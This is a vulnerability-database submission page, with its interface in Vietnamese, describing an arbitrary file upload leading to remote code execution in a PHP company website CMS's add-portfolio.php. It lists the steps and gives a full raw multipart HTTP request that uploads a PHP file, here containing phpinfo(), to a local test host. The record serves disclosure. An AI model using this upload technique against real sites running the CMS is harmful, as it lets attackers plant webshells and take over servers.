Gửi #43178: Company Website CMS Backstage management add-portfolio RCEthông tin

tiêu đềCompany Website CMS Backstage management add-portfolio RCE
Mô tảinfo:There is an arbitrary file upload vulnerability in the company's website CMS background management add-portfolio Add a portfolio in the background, upload attachments, capture packages, and modify the attachment suffix to php as needed. Modify the attached content php code getshell to achieve RCE. Then traverse the URL:/dashboard/uploads/portfolio/xxxxx.php access payload: POST /dashboard/add-portfolio.php HTTP/1.1 Host: 192.168.153.1:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------181572735023140528043402355237 Content-Length: 769 Origin: http://192.168.153.1:8090 Connection: close Referer: http://192.168.153.1:8090/dashboard/add-portfolio.php Cookie: PHPSESSID=vomi3si61qo6kdmeg950fo9uk2 Upgrade-Insecure-Requests: 1 -----------------------------181572735023140528043402355237 Content-Disposition: form-data; name="port_title" ssssssssssssssssssssssss -----------------------------181572735023140528043402355237 Content-Disposition: form-data; name="port_desc" ssssssssssssssssssssssss -----------------------------181572735023140528043402355237 Content-Disposition: form-data; name="port_detail" ssssssssssssssssssssssss -----------------------------181572735023140528043402355237 Content-Disposition: form-data; name="ufile"; filename="123.php" Content-Type: image/png <?php phpinfo();?> -----------------------------181572735023140528043402355237 Content-Disposition: form-data; name="save" -----------------------------181572735023140528043402355237--
Nguồn⚠️ www.sourcecodester.com/php/15517/company-website-cms-php.html
Người dùng
 jsbae3449 (UID 30775)
Đệ trình09/08/2022 19:33 (cách đây 4 những năm)
Kiểm duyệt10/08/2022 08:18 (13 hours later)
Trạng tháiđược chấp nhận
Mục VulDB206024 [SourceCodester Company Website CMS add-portfolio.php ufile nâng cao đặc quyền]
điểm17

Interested in the pricing of exploits?

See the underground prices here!